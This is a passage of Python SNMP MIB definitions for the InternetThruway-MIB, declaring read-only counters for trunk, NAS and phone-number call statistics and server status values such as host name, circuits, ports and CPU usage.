if mibBuilder.loadTexts: trunkInCallNormalCompletions.setDescription('Total number of incoming call legs completed normally.')
trunkInCallAbnormalCompletions = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4, 1, 1, 18), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: trunkInCallAbnormalCompletions.setStatus('mandatory')
if mibBuilder.loadTexts: trunkInCallAbnormalCompletions.setDescription('Total number of incoming call legs completed abnormally.')
trunkUserBusyInCallRejects = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4, 1, 1, 19), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: trunkUserBusyInCallRejects.setStatus('mandatory')
if mibBuilder.loadTexts: trunkUserBusyInCallRejects.setDescription('Total Number of incoming call legs rejected due to user busy signal.')
trunkTempFailInCallRejects = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4, 1, 1, 20), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: trunkTempFailInCallRejects.setStatus('mandatory')
if mibBuilder.loadTexts: trunkTempFailInCallRejects.setDescription('Total Number of incoming call legs rejected due to temporary failure.')
trunkUserUnavailableInCallRejects = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4, 1, 1, 21), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: trunkUserUnavailableInCallRejects.setStatus('mandatory')
if mibBuilder.loadTexts: trunkUserUnavailableInCallRejects.setDescription('Total number of incoming call legs failed due to user not available.')
trunkAbnormalReleaseInCallRejects = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4, 1, 1, 22), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: trunkAbnormalReleaseInCallRejects.setStatus('mandatory')
if mibBuilder.loadTexts: trunkAbnormalReleaseInCallRejects.setDescription('Total Number of incoming call legs rejected due to abnormal release.')
trunkOtherInCallRejects = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4, 1, 1, 23), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: trunkOtherInCallRejects.setStatus('mandatory')
if mibBuilder.loadTexts: trunkOtherInCallRejects.setDescription('Total Number of incoming call legs rejected due to other reasons.')
trunkCumulativeActiveInCalls = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4, 1, 1, 24), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: trunkCumulativeActiveInCalls.setStatus('mandatory')
if mibBuilder.loadTexts: trunkCumulativeActiveInCalls.setDescription('Cumulative Number of incoming call legs active so far.')
trunkCurrentlyActiveInCalls = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4, 1, 1, 25), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: trunkCurrentlyActiveInCalls.setStatus('mandatory')
if mibBuilder.loadTexts: trunkCurrentlyActiveInCalls.setDescription('Total Number of incoming call legs currently active.')
trunkCurrentlyActiveDigitalInCalls = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4, 1, 1, 26), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: trunkCurrentlyActiveDigitalInCalls.setStatus('mandatory')
if mibBuilder.loadTexts: trunkCurrentlyActiveDigitalInCalls.setDescription('Total Number of incoming digital call legs currently active.')
trunkCurrentlyActiveAnalogInCalls = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4, 1, 1, 27), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: trunkCurrentlyActiveAnalogInCalls.setStatus('mandatory')
if mibBuilder.loadTexts: trunkCurrentlyActiveAnalogInCalls.setDescription('Total Number of incoming analog call legs currently active.')
trunkAllActiveCalls = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4, 1, 1, 28), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: trunkAllActiveCalls.setStatus('mandatory')
if mibBuilder.loadTexts: trunkAllActiveCalls.setDescription('Total number of currently active call legs (all type).')
trunkOccupancyPerCCS = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4, 1, 1, 29), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: trunkOccupancyPerCCS.setStatus('mandatory')
if mibBuilder.loadTexts: trunkOccupancyPerCCS.setDescription('Trunk occupancy in Centum Call Seconds.')
trafficInCCSs = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4, 1, 1, 30), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: trafficInCCSs.setStatus('mandatory')
if mibBuilder.loadTexts: trafficInCCSs.setDescription('Scanned om for tgms that are call busy')
trafficInCCSIncomings = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4, 1, 1, 31), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: trafficInCCSIncomings.setStatus('mandatory')
if mibBuilder.loadTexts: trafficInCCSIncomings.setDescription('Scanned Om on tgms with an incoming call.')
localBusyInCCSs = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4, 1, 1, 32), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: localBusyInCCSs.setStatus('mandatory')
if mibBuilder.loadTexts: localBusyInCCSs.setDescription('Scanned om for tgms that are locally blocked.')
remoteBusyInCCSs = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4, 1, 1, 33), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: remoteBusyInCCSs.setStatus('mandatory')
if mibBuilder.loadTexts: remoteBusyInCCSs.setDescription('Scanned om for tgms that are remotely blocked.')
nasCallOMTable = MibTable((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 7, 1), )
if mibBuilder.loadTexts: nasCallOMTable.setStatus('mandatory')
if mibBuilder.loadTexts: nasCallOMTable.setDescription('The NasCallOMTable contains call related OMs on a nas basis')
nasCallOMTableEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 7, 1, 1), ).setIndexNames((0, "InternetThruway-MIB", "nasCallOMIndex"))
if mibBuilder.loadTexts: nasCallOMTableEntry.setStatus('mandatory')
if mibBuilder.loadTexts: nasCallOMTableEntry.setDescription('An entry in the NasCallOMTable. Indexed by nasCallOMIndex.')
nasCallOMIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 7, 1, 1, 1), Integer32())
if mibBuilder.loadTexts: nasCallOMIndex.setStatus('mandatory')
if mibBuilder.loadTexts: nasCallOMIndex.setDescription('Identifies a nas Call OM .')
nasName1 = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 7, 1, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nasName1.setStatus('mandatory')
if mibBuilder.loadTexts: nasName1.setDescription('A unique alphanumeric value to identify this Nas.')
numberOfPorts = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 7, 1, 1, 3), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: numberOfPorts.setStatus('mandatory')
if mibBuilder.loadTexts: numberOfPorts.setDescription('Total Number of Ports provisioned against this nas.')
nasOutCallAttempts = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 7, 1, 1, 4), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nasOutCallAttempts.setStatus('mandatory')
if mibBuilder.loadTexts: nasOutCallAttempts.setDescription('Total number of outgoing call legs attempted.')
nasOutCallNormalCompletions = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 7, 1, 1, 5), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nasOutCallNormalCompletions.setStatus('mandatory')
if mibBuilder.loadTexts: nasOutCallNormalCompletions.setDescription('Total number of outgoing call legs completed normally.')
nasOutCallAbnormalCompletions = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 7, 1, 1, 6), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nasOutCallAbnormalCompletions.setStatus('mandatory')
if mibBuilder.loadTexts: nasOutCallAbnormalCompletions.setDescription('Total number of outgoing call legs completed abnormally.')
nasUserBusyOutCallRejects = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 7, 1, 1, 7), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nasUserBusyOutCallRejects.setStatus('mandatory')
if mibBuilder.loadTexts: nasUserBusyOutCallRejects.setDescription('Total Number of outgoing call legs rejected due to user busy signal.')
nasTempFailOutCallRejects = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 7, 1, 1, 8), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nasTempFailOutCallRejects.setStatus('mandatory')
if mibBuilder.loadTexts: nasTempFailOutCallRejects.setDescription('Total Number of outgoing call legs rejected due to temporary failure.')
nasUserUnavailableOutCallRejects = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 7, 1, 1, 9), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nasUserUnavailableOutCallRejects.setStatus('mandatory')
if mibBuilder.loadTexts: nasUserUnavailableOutCallRejects.setDescription('Total number of outgoing call legs failed due to user not available.')
nasAbnormalReleaseOutCallRejects = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 7, 1, 1, 10), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nasAbnormalReleaseOutCallRejects.setStatus('mandatory')
if mibBuilder.loadTexts: nasAbnormalReleaseOutCallRejects.setDescription('Total Number of outgoing call legs rejected due to abnormal release.')
nasOtherOutCallRejects = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 7, 1, 1, 11), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nasOtherOutCallRejects.setStatus('mandatory')
if mibBuilder.loadTexts: nasOtherOutCallRejects.setDescription('Total Number of outgoing call legs rejected due to other reasons.')
nasCumulativeActiveOutCalls = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 7, 1, 1, 12), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nasCumulativeActiveOutCalls.setStatus('mandatory')
if mibBuilder.loadTexts: nasCumulativeActiveOutCalls.setDescription('Cumulative Number of outgoing call legs active so far.')
nasCurrentlyActiveOutCalls = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 7, 1, 1, 13), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nasCurrentlyActiveOutCalls.setStatus('mandatory')
if mibBuilder.loadTexts: nasCurrentlyActiveOutCalls.setDescription('Total Number of outgoing call legs currently active.')
nasCurrentlyActiveDigitalOutCalls = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 7, 1, 1, 14), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nasCurrentlyActiveDigitalOutCalls.setStatus('mandatory')
if mibBuilder.loadTexts: nasCurrentlyActiveDigitalOutCalls.setDescription('Total Number of outgoing digital call legs currently active.')
nasCurrentlyActiveAnalogOutCalls = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 7, 1, 1, 15), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nasCurrentlyActiveAnalogOutCalls.setStatus('mandatory')
if mibBuilder.loadTexts: nasCurrentlyActiveAnalogOutCalls.setDescription('Total Number of outgoing analog call legs currently active.')
nasInCallAttempts = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 7, 1, 1, 16), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nasInCallAttempts.setStatus('mandatory')
if mibBuilder.loadTexts: nasInCallAttempts.setDescription('Total number of incoming call legs attempted.')
nasInCallNormalCompletions = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 7, 1, 1, 17), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nasInCallNormalCompletions.setStatus('mandatory')
if mibBuilder.loadTexts: nasInCallNormalCompletions.setDescription('Total number of incoming call legs completed normally.')
nasInCallAbnormalCompletions = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 7, 1, 1, 18), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nasInCallAbnormalCompletions.setStatus('mandatory')
if mibBuilder.loadTexts: nasInCallAbnormalCompletions.setDescription('Total number of incoming call legs completed abnormally.')
nasUserBusyInCallRejects = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 7, 1, 1, 19), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nasUserBusyInCallRejects.setStatus('mandatory')
if mibBuilder.loadTexts: nasUserBusyInCallRejects.setDescription('Total Number of incoming call legs rejected due to user busy signal.')
nasTempFailInCallRejects = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 7, 1, 1, 20), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nasTempFailInCallRejects.setStatus('mandatory')
if mibBuilder.loadTexts: nasTempFailInCallRejects.setDescription('Total Number of incoming call legs rejected due to temporary failure.')
nasUserUnavailableInCallRejects = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 7, 1, 1, 21), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nasUserUnavailableInCallRejects.setStatus('mandatory')
if mibBuilder.loadTexts: nasUserUnavailableInCallRejects.setDescription('Total number of incoming call legs failed due to user not available.')
nasAbnormalReleaseInCallRejects = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 7, 1, 1, 22), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nasAbnormalReleaseInCallRejects.setStatus('mandatory')
if mibBuilder.loadTexts: nasAbnormalReleaseInCallRejects.setDescription('Total Number of incoming call legs rejected due to abnormal release.')
nasOtherInCallRejects = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 7, 1, 1, 23), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nasOtherInCallRejects.setStatus('mandatory')
if mibBuilder.loadTexts: nasOtherInCallRejects.setDescription('Total Number of incoming call legs rejected due to other reasons.')
nasCumulativeActiveInCalls = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 7, 1, 1, 24), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nasCumulativeActiveInCalls.setStatus('mandatory')
if mibBuilder.loadTexts: nasCumulativeActiveInCalls.setDescription('Cumulative Number of incoming call legs active so far.')
nasCurrentlyActiveInCalls = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 7, 1, 1, 25), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nasCurrentlyActiveInCalls.setStatus('mandatory')
if mibBuilder.loadTexts: nasCurrentlyActiveInCalls.setDescription('Total Number of incoming call legs currently active.')
nasCurrentlyActiveDigitalInCalls = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 7, 1, 1, 26), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nasCurrentlyActiveDigitalInCalls.setStatus('mandatory')
if mibBuilder.loadTexts: nasCurrentlyActiveDigitalInCalls.setDescription('Total Number of incoming digital call legs currently active.')
nasCurrentlyActiveAnalogInCalls = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 7, 1, 1, 27), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nasCurrentlyActiveAnalogInCalls.setStatus('mandatory')
if mibBuilder.loadTexts: nasCurrentlyActiveAnalogInCalls.setDescription('Total Number of incoming analog call legs currently active.')
nasAllActiveCalls = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 7, 1, 1, 28), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nasAllActiveCalls.setStatus('mandatory')
if mibBuilder.loadTexts: nasAllActiveCalls.setDescription('Total number of currently active call legs (all type).')
nasMaxPortsUsed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 7, 1, 1, 29), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nasMaxPortsUsed.setStatus('mandatory')
if mibBuilder.loadTexts: nasMaxPortsUsed.setDescription('Maximum number of ports used in this nas since the last system restart.')
nasMinPortsUsed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 7, 1, 1, 30), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nasMinPortsUsed.setStatus('mandatory')
if mibBuilder.loadTexts: nasMinPortsUsed.setDescription('Minimum number of ports used in this nas since the last system restart.')
nasCurrentlyInUsePorts = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 7, 1, 1, 31), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nasCurrentlyInUsePorts.setStatus('mandatory')
if mibBuilder.loadTexts: nasCurrentlyInUsePorts.setDescription('Number of ports currently in use.')
phoneCallOMTable = MibTable((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 5, 1), )
if mibBuilder.loadTexts: phoneCallOMTable.setStatus('mandatory')
if mibBuilder.loadTexts: phoneCallOMTable.setDescription('The PhoneCallOMTable contains call related OMs on a phone number basis')
phoneCallOMTableEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 5, 1, 1), ).setIndexNames((0, "InternetThruway-MIB", "phoneCallOMIndex"))
if mibBuilder.loadTexts: phoneCallOMTableEntry.setStatus('mandatory')
if mibBuilder.loadTexts: phoneCallOMTableEntry.setDescription('An entry in the PhoneCallOMTable. Indexed by phoneGroupIndex.')
phoneCallOMIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 5, 1, 1, 1), Integer32())
if mibBuilder.loadTexts: phoneCallOMIndex.setStatus('mandatory')
if mibBuilder.loadTexts: phoneCallOMIndex.setDescription('Uniquely identifies an entry in this table.')
phoneNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 5, 1, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: phoneNumber.setStatus('mandatory')
if mibBuilder.loadTexts: phoneNumber.setDescription('Phone number for the underlying Call OM record.')
phoneDialCallAttempts = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 5, 1, 1, 3), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: phoneDialCallAttempts.setStatus('mandatory')
if mibBuilder.loadTexts: phoneDialCallAttempts.setDescription('Total number of dial calls attempted.')
phoneDialCallNormalCompletions = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 5, 1, 1, 4), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: phoneDialCallNormalCompletions.setStatus('mandatory')
if mibBuilder.loadTexts: phoneDialCallNormalCompletions.setDescription('Total number of dial calls completed normally.')
phoneDialCallAbnormalCompletions = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 5, 1, 1, 5), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: phoneDialCallAbnormalCompletions.setStatus('mandatory')
if mibBuilder.loadTexts: phoneDialCallAbnormalCompletions.setDescription('Total number of dial calls completed abnormally.')
phoneUserBusyDialCallRejects = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 5, 1, 1, 6), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: phoneUserBusyDialCallRejects.setStatus('mandatory')
if mibBuilder.loadTexts: phoneUserBusyDialCallRejects.setDescription('Total Number of dial calls rejected due to user busy signal.')
phoneTempFailDialCallRejects = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 5, 1, 1, 7), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: phoneTempFailDialCallRejects.setStatus('mandatory')
if mibBuilder.loadTexts: phoneTempFailDialCallRejects.setDescription('Total Number of dial calls rejected due to temporary failure.')
phoneUserUnavailableDialCallRejects = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 5, 1, 1, 8), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: phoneUserUnavailableDialCallRejects.setStatus('mandatory')
if mibBuilder.loadTexts: phoneUserUnavailableDialCallRejects.setDescription('Total number of dial calls failed due to user not available.')
phoneAbnormalReleaseDialCallRejects = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 5, 1, 1, 9), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: phoneAbnormalReleaseDialCallRejects.setStatus('mandatory')
if mibBuilder.loadTexts: phoneAbnormalReleaseDialCallRejects.setDescription('Total Number of dial calls rejected due to abnormal release.')
phoneOtherDialCallRejects = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 5, 1, 1, 10), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: phoneOtherDialCallRejects.setStatus('mandatory')
if mibBuilder.loadTexts: phoneOtherDialCallRejects.setDescription('Total Number of dial calls rejected due to other reasons.')
phoneCumulativeActiveDialCalls = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 5, 1, 1, 11), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: phoneCumulativeActiveDialCalls.setStatus('mandatory')
if mibBuilder.loadTexts: phoneCumulativeActiveDialCalls.setDescription('Cumulative Number of dial calls active so far.')
phoneCurrentlyActiveDialCalls = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 5, 1, 1, 12), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: phoneCurrentlyActiveDialCalls.setStatus('mandatory')
if mibBuilder.loadTexts: phoneCurrentlyActiveDialCalls.setDescription('Total Number of dial calls currently active.')
phoneCurrentlyActiveDigitalDialCalls = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 5, 1, 1, 13), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: phoneCurrentlyActiveDigitalDialCalls.setStatus('mandatory')
if mibBuilder.loadTexts: phoneCurrentlyActiveDigitalDialCalls.setDescription('Total Number of digital dial calls currently active.')
phoneCurrentlyActiveAnalogDialCalls = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 5, 1, 1, 14), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: phoneCurrentlyActiveAnalogDialCalls.setStatus('mandatory')
if mibBuilder.loadTexts: phoneCurrentlyActiveAnalogDialCalls.setDescription('Total Number of analog dial calls currently active.')
csgComplexCLLI = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 6, 1), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: csgComplexCLLI.setStatus('mandatory')
if mibBuilder.loadTexts: csgComplexCLLI.setDescription('A unique identifier of the CSG Complex.')
serverHostName = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 6, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: serverHostName.setStatus('mandatory')
if mibBuilder.loadTexts: serverHostName.setDescription('Host Name of this server.')
serverIpAddress = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 6, 3), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: serverIpAddress.setStatus('mandatory')
if mibBuilder.loadTexts: serverIpAddress.setDescription('IP address of this server.')
serverCLLI = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 6, 4), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: serverCLLI.setStatus('mandatory')
if mibBuilder.loadTexts: serverCLLI.setDescription('A unique identifier of this server (common in the telco world).')
mateServerHostName = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 6, 5), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mateServerHostName.setStatus('mandatory')
if mibBuilder.loadTexts: mateServerHostName.setDescription('Host Name of this server.')
mateServerIpAddress = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 6, 6), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mateServerIpAddress.setStatus('mandatory')
if mibBuilder.loadTexts: mateServerIpAddress.setDescription('IP address of this server.')
serverMemSize = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 6, 8), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: serverMemSize.setStatus('mandatory')
if mibBuilder.loadTexts: serverMemSize.setDescription('Memory size in mega bytes of this server.')
provisionedDPCs = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 6, 9), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: provisionedDPCs.setStatus('mandatory')
if mibBuilder.loadTexts: provisionedDPCs.setDescription('Number of destination point codes provisioned.')
provisionedCircuits = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 6, 10), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: provisionedCircuits.setStatus('mandatory')
if mibBuilder.loadTexts: provisionedCircuits.setDescription('Number of circuits provisioned.')
inserviceCircuits = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 6, 11), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: inserviceCircuits.setStatus('mandatory')
if mibBuilder.loadTexts: inserviceCircuits.setDescription('Number of circuits in service. This number goes up or down at any given time.')
provisionedNASes = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 6, 12), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: provisionedNASes.setStatus('mandatory')
if mibBuilder.loadTexts: provisionedNASes.setDescription('Number of NASes provisioned.')
aliveNASes = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 6, 13), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: aliveNASes.setStatus('mandatory')
if mibBuilder.loadTexts: aliveNASes.setDescription('Number of NASes known to be alive. This number goes up or down at any given time.')
inserviceNASes = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 6, 14), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: inserviceNASes.setStatus('mandatory')
if mibBuilder.loadTexts: inserviceNASes.setDescription('Number of NASes in service. This number goes up or down at any given time.')
provsionedCards = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 6, 15), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: provsionedCards.setStatus('mandatory')
if mibBuilder.loadTexts: provsionedCards.setDescription('Number of NAS cards provisioned.')
inserviceCards = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 6, 16), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: inserviceCards.setStatus('mandatory')
if mibBuilder.loadTexts: inserviceCards.setDescription('Number of NAS cards in service. This number goes up or down at any given time.')
provisionedPorts = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 6, 17), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: provisionedPorts.setStatus('mandatory')
if mibBuilder.loadTexts: provisionedPorts.setDescription('Number of ports provisioned.')
inservicePorts = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 6, 18), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: inservicePorts.setStatus('mandatory')
if mibBuilder.loadTexts: inservicePorts.setDescription('Number of ports in service. This number goes up or down at any given time.')
userCPUUsage = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 6, 19), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: userCPUUsage.setStatus('mandatory')
if mibBuilder.loadTexts: userCPUUsage.setDescription('Percentage of CPU used in user domain. Survman computes this value in every 600 seconds. The value stored in the MIB will be the last one computed.')
systemCPUUsage = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 6, 20), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: systemCPUUsage.setStatus('mandatory')
if mibBuilder.loadTexts: systemCPUUsage.setDescription('Percentage of CPU used in system domain in this server. Survman computes this value in every 600 seconds. The value stored in the MIB will be the last one computed.')
totalCPUUsage = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 6, 21), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: totalCPUUsage.setStatus('mandatory')
if mibBuilder.loadTexts: totalCPUUsage.setDescription('Percentage of CPU used in total in this server Survman computes this value in every 600 seconds. The value stored in the MIB will be the last one computed.')
maxCPUUsage = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 6, 22), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: maxCPUUsage.setStatus('mandatory')
if mibBuilder.loadTexts: maxCPUUsage.setDescription('High water measurement. Maximum CPU Usage (%) in this server. Survman computes this value in every 600 seconds. The value stored in the MIB will be the last one computed.')
avgLoad = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 6, 23), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: avgLoad.setStatus('mandatory')
if mibBuilder.loadTexts: avgLoad.setDescription('Average CPU load factor in this server. Survman computes this value in every 600 seconds. The value stored in the MIB will be the last one computed.')
systemCallRate = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 6, 24), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: systemCallRate.setStatus('mandatory')
if mibBuilder.loadTexts: systemCallRate.setDescription('System Call rate (per second) in this Cserver. Survman computes this value in every 600 seconds. The value stored in the MIB will be the one computed the last time.')
